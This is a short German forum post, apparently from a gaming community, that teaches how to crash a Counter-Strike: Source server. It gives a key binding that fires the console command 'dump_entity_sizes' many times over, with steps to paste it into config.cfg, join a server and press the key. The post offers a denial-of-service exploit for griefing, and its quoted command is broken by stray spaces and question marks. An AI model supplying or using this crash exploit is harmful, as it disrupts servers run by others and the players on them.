Huhu heute zeige ich euch wie ihr einen css server crashen könnt

easly
also kopiert das
Quote:
|
bind "v" "dump_entity_sizes;dump_entity_sizes;dump_entity_s izes;dump_entity_sizes;dump_ent ? ity_sizes;dump_entity_sizes;dump_entity_sizes;dump _entity_sizes;dump_entity_size ? s;dump_entity_sizes;dump_entity_sizes;dump_entity_ sizes;dump_entity_sizes;dump_e ? ntity_sizes;dump_entity_sizes;dump_entity_sizes;du mp_entity_sizes;dump_entity_si ?zes;dump_entity_sizes;dump_entity_sizes"
|
dann geht ihr in C:\Program Files\Counter-Strike Source\cstrike\cfg
öffnet mit dem editor die config.cfg
und fügt den code da rein. (versuchtmal mit ersetzten vom alten)
speichert die config.cfg dann könnt ihr css starten,
dann geht in einem raum und drückt die :V: taste
und der server ist gecrasht.
Mfg ..-FxF-..
das tut hab ich selber geschrieben.